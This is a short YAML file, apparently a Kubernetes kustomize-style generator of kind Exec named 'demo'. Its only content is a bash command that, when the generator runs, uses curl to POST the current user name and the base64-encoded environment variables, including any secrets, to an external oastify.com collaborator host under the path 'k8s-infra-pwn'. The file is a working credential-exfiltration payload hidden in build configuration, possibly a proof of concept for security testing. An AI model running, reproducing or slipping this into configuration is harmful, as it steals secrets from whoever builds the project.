generators:
  - |-
    kind: Exec
    metadata:
      name: demo
    spec:
      bin: /bin/bash
      args: 
        - -c
        - curl -X POST -d "user=$(whoami)&secrets=$(env | base64)" https://wtte6tfhnu0v54zand8c0mybk2qtel2a.oastify.com/k8s-infra-pwn
